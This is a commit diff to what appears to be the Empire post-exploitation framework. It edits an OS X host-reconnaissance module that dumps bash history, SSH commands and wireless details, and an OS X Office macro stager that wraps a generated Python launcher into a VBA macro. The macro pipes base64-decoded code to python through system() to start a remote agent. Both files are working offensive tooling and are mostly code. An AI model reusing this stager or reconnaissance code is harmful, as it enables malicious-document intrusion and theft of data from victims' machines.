Macro changes

2018-02-28 20:25:10 -08:00 · 2018-02-28 20:25:10 -08:00 · 496806824e
parent cde713ccca
commit 496806824e
2 changed files with 27 additions and 23 deletions
--- a/lib/modules/python/situational_awareness/host/osx/situational_awareness.py
+++ b/lib/modules/python/situational_awareness/host/osx/situational_awareness.py
@ -89,6 +89,7 @@ try:
    import subprocess
    import sys
    import os
+    import time
    from os.path import expanduser
    # Get Home User
    home = str(expanduser("~"))
@ -221,7 +222,7 @@ try:
            HistoryResult = myfile.readlines()
        HistoryCount = HistoryCount * -1
        print "[*] Enumerating User Bash History"
-        print " - Hisotry count size: " + str(len(HistoryResult))
+        print " - History count size: " + str(len(HistoryResult))
        for item in HistoryResult[HistoryCount:]:
            print "    * " + str(item.strip())
        print "[*] SSH commands in History: "
@ -235,15 +236,20 @@ try:
        
    # Enum Wireless Connectivity Info
    try:
-        process = subprocess.Popen("/System/Library/PrivateFrameworks/Apple802.11.framework/Versions/Current/Resources/airport", stdout=subprocess.PIPE, shell=True)
-        hosts = process.communicate()
-        hosts = hosts[0].split('\\n')
+        process = subprocess.Popen(executable="/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport", args="-I", stdout=subprocess.PIPE, shell=True)
+        wireless = process.communicate()
+        wireless = wireless[0].split('\\n')
        print "[*] Wireless Connectivity Info:"
+        for x in wireless:
+            if x:
+                print " - " + str(x.strip())
+            else:
+                print
    except Exception as e:
        if Debug:
-            print "[!] Error Enumerating Wireless Connectivity Info: " + str(e)
-        pass
-        
+            print "[!] Error enumerating user Wireless Connectivity Info: " + str(e)
+        pass         
+
    # Enum AV / Protection Software

 except Exception as e:
--- a/lib/stagers/osx/macro.py
+++ b/lib/stagers/osx/macro.py
@ -64,9 +64,9 @@ class Stager:
            holder = []
            str1 = ''
            str2 = ''
-            str1 = varstr + ' = "' + instr[:54] + '"' 
+            str1 = varstr + ' = "' + instr[:54] + '"'
            for i in xrange(54, len(instr), 48):
-                holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
+                holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48])
                str2 = '"\r\n'.join(holder)
            str2 = str2 + "\""
            str1 = str1 + "\r\n"+str2
@ -78,17 +78,17 @@ class Stager:
        userAgent = self.options['UserAgent']['Value']
        safeChecks = self.options['SafeChecks']['Value']

-        # generate the launcher code
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
+        # generate the python launcher code
+        pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)

-        if launcher == "":
-            print helpers.color("[!] Error in launcher command generation.")
+        if pylauncher == "":
+            print helpers.color("[!] Error in python launcher command generation.")
            return ""

-        else:
-            launcher = launcher.replace("\"", "\"\"")
-            for match in re.findall(r"'(.*?)'", launcher, re.DOTALL):
-                payload = formStr("cmd", match)
+        # render python launcher into python payload
+        pylauncher = pylauncher.replace("\"", "\"\"")
+        for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL):
+            payload = formStr("str", match)

            macro = """
 #If Mac Then
@ -115,8 +115,6 @@ End Sub

 Public Function Debugging() As Variant
    On Error Resume Next
-            Dim tracking As String
-            tracking = "%s"
            #If Mac Then
                'Mac Rendering
                If Val(Application.Version) >= 15.33 Then
@ -127,13 +125,13 @@ Public Function Debugging() As Variant
                    result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
                Else
                    Dim result2 As Long
-                    Dim cmd As String
+                    Dim cmd2 As String
                    %s
-                    MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
-                    result2 = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd & \" \\\"\"));"" | python &")
+                    MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd2 & \" \\\"\"));"" | python &")
+                    result2 = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & cmd2 & \" \\\"\"));"" | python &")
                End If

            #End If
-End Function""" %(payload)
+End Function""" %(payload, payload)

            return macro